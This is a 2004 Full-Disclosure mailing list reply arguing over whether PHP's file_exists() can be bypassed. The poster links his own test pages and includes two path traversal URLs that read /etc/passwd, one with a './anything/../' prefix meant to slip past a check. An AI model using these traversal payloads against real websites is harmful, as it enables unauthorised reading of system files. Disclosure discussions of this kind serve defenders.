[Full-Disclosure] RE: file_exists() bypassing , critical problem ?

Mon, 02 Feb 2004 07:48:40 -0800 

Hi,

It depends of your php configuration... (but it's not a vulnerability so
..... i can say you what's the configuration is good ,because firstly nobody
listen me and secondly php-group are blind and deaf)

look this :

http://lists.netsys.com/pipermail/full-disclosure/2004-February/016612.html

http://www.opensavoir.com/test.txt
http://www.opensavoir.com/test.php


http://www.opensavoir.com/test.php?page=../../../../../../../../../../etc/pa
sswd

but it's not a vulnerability HA ! HA ! HA ! show this :

http://www.opensavoir.com/test.php?page=./anything/../../../../../../../../.
./../etc/passwd

:)


Nourredine Himeur

www.security-challenge.com



_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Reply via email to